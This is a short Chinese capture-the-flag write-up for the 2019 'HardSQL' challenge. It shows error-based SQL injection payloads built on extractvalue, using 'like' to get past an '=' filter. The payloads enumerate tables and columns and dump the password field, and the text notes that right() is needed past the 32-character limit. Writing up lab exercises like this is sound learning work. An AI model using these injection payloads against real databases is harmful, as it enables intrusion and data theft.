标签:极客 extractvalue HardSQL 0x7e 2019 select table concat schema
-
首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试
-
在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了
-
爆名
admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#
-
爆字段
admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#
-
查数据
admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#
-
这里最关键的点来了,我们爆出来的是部分flag
extractvalue和updatexml只显示32围字符
所以我们需要使用right()函数爆出右边的部分flag
标签:极客,extractvalue,HardSQL,0x7e,2019,select,table,concat,schema 来源: https://www.cnblogs.com/lzwhehe/p/15546487.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。